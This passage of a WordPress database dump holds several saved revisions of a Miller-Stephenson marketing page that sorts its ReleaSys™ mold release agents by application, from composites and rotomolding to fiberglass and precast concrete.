Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:18:14', '2017-06-08 18:18:14', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4523, 2, '2017-06-08 18:18:50', '2017-06-08 18:18:50', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p><a name="polyurethane"></a></p>\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:18:50', '2017-06-08 18:18:50', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4524, 2, '2017-06-08 18:20:11', '2017-06-08 18:20:11', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p><a name="polyurethane"></a></p>\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p><a name="rubber"></a></p>\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:20:11', '2017-06-08 18:20:11', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4525, 2, '2017-06-08 18:20:42', '2017-06-08 18:20:42', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p><a name="polyurethane"></a></p>\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n<p><a name="rubber"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:20:42', '2017-06-08 18:20:42', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
